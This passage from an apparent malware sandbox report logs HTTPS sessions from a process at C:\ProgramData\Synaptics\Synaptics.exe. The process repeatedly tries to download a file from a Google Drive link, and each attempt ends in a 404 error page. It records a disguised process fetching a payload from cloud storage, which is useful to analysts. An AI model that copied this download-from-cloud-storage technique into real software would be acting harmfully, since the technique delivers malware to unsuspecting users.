                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: keep-alive
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      X-Cache: MISS
                                                                                                                      Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.849712172.217.16.2064438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:34:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:30 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5YpfrkU6Skt1iC4MhFrs9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.849711172.217.16.2064438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:34:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:30 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HsfcgZAIKLBjc3mqGcCEgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.849719142.250.185.1934438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:31 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-30 10:34:31 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7Xd3_EMkfUx_20vx6MfwG2icaDFhALM4aQMyz5JJoKY2xxg-QTEFjY6pGG9gUooI2KuwvanQM
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:31 GMT
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5w9UjrPxoPLcZp8oVXg14w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Set-Cookie: NID=520=b1T8znPmh3zSMqQEaToyoyRR9X7BvTrQG4NcFjWxcs5T5xI3izk4l5pYgmo3LnBbUuh724lxK41R0ljONN_39-P4Okj2pNHYDUcv4mYcXn-23pqVqy7cjDrErXAy4iNrt2dW3TbnBbmAIj_7BLQGQmvnSpM5VdzQNxSbC-2fZwUqd-RZQ6y5YrY; expires=Tue, 01-Jul-2025 10:34:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:34:31 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 6a 50 34 33 43 71 68 45 77 62 79 43 35 56 61 4c 66 6a 74 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7jP43CqhEwbyC5VaLfjtnw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                      2024-12-30 10:34:31 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.849718142.250.185.1934438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:31 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-30 10:34:31 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4mllYNGJPAIPIbtLCcv8_ugLJ2jVzO3XbiV-I7ETyrZ4MDatLmkmhrurGmooaW-etctaRYLXo
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:31 GMT
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SdsENuDFnIx-R_ESttZWeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Set-Cookie: NID=520=Ped9FFu77ZILljDRdPx4jmMXgH_9clhvCrKcOs0vHo5Wh5NQRqtD2bTclKsZHpXc_yNTCnedWDYMKz3uCDArCyXwnKDw6vH-8GIIWrExz2AkW205gWJXFurdY0IJGp63ZylB0bEx3aie6cdBXZS-_R3SSHM6X3X9WwZL56Wjt5UdLiU7-iFR_yg; expires=Tue, 01-Jul-2025 10:34:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:34:31 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 74 6d 37 37 70 77 37 39 56 49 37 64 76 50 38 52 63 74 6c 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0tm77pw79VI7dvP8RctlQg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                      2024-12-30 10:34:31 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.849716172.217.16.2064438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:34:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:31 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JpV8hamAX6p3FHGuaPvD0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.849717172.217.16.2064438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:34:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:31 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MMe4Tb6arj_EGGfCoYq2Uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.849721142.250.185.1934438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=Ped9FFu77ZILljDRdPx4jmMXgH_9clhvCrKcOs0vHo5Wh5NQRqtD2bTclKsZHpXc_yNTCnedWDYMKz3uCDArCyXwnKDw6vH-8GIIWrExz2AkW205gWJXFurdY0IJGp63ZylB0bEx3aie6cdBXZS-_R3SSHM6X3X9WwZL56Wjt5UdLiU7-iFR_yg
                                                                                                                      2024-12-30 10:34:38 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5MOdsMS9KwVoKhp4-uobBjly47LrC_d_StgbXjCxzPyxTQOxbztRhPV1_lKpPb60sD
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:38 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-rA1N6EBTeHmyzOzX0eCDyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:34:38 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:34:38 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 4c 6d 4c 59 75 4f 4a 31 59 30 78 79 57 66 5f 30 45 54 52 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="WLmLYuOJ1Y0xyWf_0ETRgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:34:38 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.849725142.250.185.1934438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=b1T8znPmh3zSMqQEaToyoyRR9X7BvTrQG4NcFjWxcs5T5xI3izk4l5pYgmo3LnBbUuh724lxK41R0ljONN_39-P4Okj2pNHYDUcv4mYcXn-23pqVqy7cjDrErXAy4iNrt2dW3TbnBbmAIj_7BLQGQmvnSpM5VdzQNxSbC-2fZwUqd-RZQ6y5YrY
                                                                                                                      2024-12-30 10:34:38 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7XEmoZLgH5Fm9-v4-H_mQ85b61KP1oWHkMlt2NEtwWau7v0JES7SD-mEsa4uX4fNRL
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:38 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-l6_yqnUDhPkx2xJ1KyRNGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:34:38 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
